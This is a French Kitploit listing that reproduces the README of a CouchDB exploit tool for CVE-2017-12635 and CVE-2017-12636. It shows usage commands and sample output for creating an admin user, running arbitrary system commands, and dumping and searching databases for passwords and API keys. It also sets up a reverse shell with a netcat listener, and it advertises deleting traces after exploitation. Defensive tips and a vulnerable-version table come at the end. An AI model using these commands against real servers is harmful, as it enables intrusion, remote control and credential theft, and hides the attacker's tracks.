Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
couchdb-exploit — Exploite CouchDB CVE-2017-12635/12636 pour l'élévation de privilèges et l'exécution de code à distance (RCE), puis fournit un shell interactif avec exécution de commandes, exploration de la base de données et shell inversé. | Kitploit
Outils/GitHubGitHub/darabium/couchdb-exploit
Escalade de PrivilègesExploitationCollecte d'InformationsPost-ExploitationTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubdarabium/couchdb-exploit

couchdb-exploit

Exploite CouchDB CVE-2017-12635/12636 pour l'élévation de privilèges et l'exécution de code à distance (RCE), puis fournit un shell interactif avec exécution de commandes, exploration de la base de données et shell inversé.

Voir le dépôt
il y a 18 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚀 CouchDB Exploit - CVE-2017-12635 & CVE-2017-12636

Python License CVE CVE

Apache CouchDB - Élévation de privilèges & Exécution de code à distance

GitHub stars GitHub forks


📖 Vue d'ensemble

Cet outil exploite deux vulnérabilités critiques dans Apache CouchDB :

CVEDescriptionGravité
CVE-2017-12635Élévation de privilèges via contournement de l'analyse JSON🔴 Critique
CVE-2017-12636Exécution de code à distance via le Query Server🔴 Critique

Comment ça fonctionne

  1. CVE-2017-12635 : Exploite l'analyse JSON incohérente entre les analyseurs Erlang et JavaScript pour créer un utilisateur admin
  2. CVE-2017-12636 : Utilise l'accès admin pour configurer un Query Server malveillant et exécuter des commandes système

🎯 Versions vulnérables

Vérification rapide

curl http://target:5984/

If version is 1.x.x or 2.0.x/2.1.0 → VULNERABLE

✨ Fonctionnalités

root@kitploit:~
✅ Exploitation automatique - Une seule commande pour tout contrôler

✅ Shell interactif - Interface de commande conviviale

✅ Visionneuse de bases de données - Parcourez toutes les bases et documents

✅ Affichage JSON complet - Voyez tout le contenu des documents

✅ Recherche globale - Recherchez des mots-clés dans toutes les bases de données

✅ Commandes système - Exécutez des commandes arbitraires sur la cible

✅ Reverse shell - Obtenez un shell interactif complet

✅ Historique des commandes - Suivez vos actions

✅ Nettoyage automatique - Supprimez les traces après l'exploitation

✅ Sortie colorée - Facile à lire et à comprendre

📦 Installation Prérequis bash

Python 3.6+ required

python3 --version

Cloner et installer bash

Clone the repository

git clone https://github.com/darabium/couchdb-exploit.git cd couchdb-exploit

Install dependencies

pip install -r requirements.txt

Dépendances txt

requests>=2.25.0 urllib3>=1.26.0

🚀 Utilisation Utilisation de base bash

Simple exploit

python3 couchdb-exploit.py -t <TARGET_IP> -p

Example

python3 couchdb-exploit.py -t 192.168.1.100 -p 5984

Options de la ligne de commande bash

python3 couchdb-exploit.py -h

usage: couchdb-exploit.py [-h] -t TARGET [-p PORT]

arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Target IP address or hostname -p PORT, --port PORT Target port (default: 5984)

💻 Commandes

Une fois l'exploitation réussie, vous disposez d'un shell interactif : Commande Description Exemple db Affiche toutes les bases de données avec le nombre de documents db view Affiche TOUS les documents d'une base de données (JSON complet) view passwords raw Affiche la réponse brute du serveur raw admin count Compte les documents d'une base de données count users search Recherche un mot-clé dans TOUTES les bases de données search admin exec Exécute une commande système exec whoami reverse Configure un reverse shell reverse 10.0.0.1 4444 history Affiche l'historique des commandes history help Affiche ce menu help exit Quitte avec nettoyage exit 📊 Exemples

  1. Lister toutes les bases de données bash

couchdb> db

[+] 39 databases:

  1. _replicator (0 docs)

  2. _users (12 docs)

  3. admin (5 docs)

  4. passwords (25 docs)

  5. core-configuration (8 docs) ...

  6. Visualiser le contenu d'une base de données bash

couchdb> view passwords

[+] Viewing database: passwords

[*] Total documents: 25

📄 Document #1 ID: user_admin Full content: { "_id": "user_admin", "username": "admin", "password": "Admin123!", "email": "[email protected]", "role": "superadmin" }

  1. Rechercher des identifiants bash

couchdb> search password

[+] Searching for 'password' in all databases...

✅ Found in 'passwords' ID: user1 Content: { "username": "root", "password": "rootpass123" }

✅ Found in 'config' ID: app_settings Content: { "db_password": "secret123", "api_key": "sk_live_abc123" }

  1. Exécuter des commandes système bash

couchdb> exec whoami [+] Executing: whoami [+] Command executed!

couchdb> exec id [+] Executing: id [+] Command executed!

  1. Reverse shell bash

On your machine (listener)

nc -lvnp 4444

In the exploit

couchdb> reverse 10.0.0.1 4444 [+] Setting up reverse shell to 10.0.0.1:4444 [!] Make sure listener is running: nc -lvnp 4444 [?] Continue? (y/n): y [+] Reverse shell triggered!

You should get a shell on your listener!

🖼️ Captures d'écran Exploitation en action

https://via.placeholder.com/800x400?text=Exploit+Demo+Screenshot Vue de la base de données

https://via.placeholder.com/800x400?text=Database+View Reverse shell

https://via.placeholder.com/800x400?text=Reverse+Shell ⚠️ Avertissement

root@kitploit:~
IMPORTANT : Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.

    🚫 Ne l'utilisez pas sur des systèmes sans autorisation explicite

    🚫 L'auteur n'est pas responsable de toute utilisation abusive

    🚫 Utilisez-le uniquement dans des environnements contrôlés ou sur vos propres systèmes

    ✅ Obtenez toujours une autorisation écrite avant de tester

    ✅ Suivez les pratiques de divulgation responsable

En utilisant cet outil, vous acceptez ces conditions. 🔐 Conseils de sécurité

Si vous êtes administrateur système :

root@kitploit:~
Mettez à niveau immédiatement vers CouchDB ≥ 1.7.0 ou ≥ 2.1.1

Utilisez un pare-feu pour restreindre l'accès au port 5984

Activez l'authentification et utilisez des mots de passe forts

Surveillez les journaux pour détecter toute activité suspecte

Réalisez des audits de sécurité réguliers de votre infrastructure

Correctif rapide bash

Upgrade CouchDB

sudo apt-get update sudo apt-get install couchdb=2.1.1 # Or latest version

Restrict access

sudo ufw allow from 192.168.1.0/24 to any port 5984

📚 Références

root@kitploit:~
CVE-2017-12635 - NVD

CVE-2017-12636 - NVD

Apache CouchDB Security

Exploit-DB

👤 Auteur

darabium

root@kitploit:~
GitHub: @darabium

Telegram: @darabium

⭐ Soutien

Si vous trouvez ce projet utile :

root@kitploit:~
⭐ Mettez une étoile au dépôt

🐛 Signalez des problèmes

🔧 Contribuez des améliorations

📢 Partagez avec d'autres

📄 Licence

Ce projet est sous licence MIT - consultez le fichier LICENSE pour plus de détails.

Fait avec ❤️ pour la recherche en sécurité

⬆ Retour en haut

Télécharger l’outil
VersionVulnérableVersion corrigée
Apache CouchDB < 1.7.0✅ Oui1.7.0
Apache CouchDB 1.x.x✅ Oui1.7.0
Apache CouchDB 2.0.0✅ Oui2.1.1
Apache CouchDB 2.1.0✅ Oui2.1.1
Apache CouchDB ≥ 2.1.1❌ Non-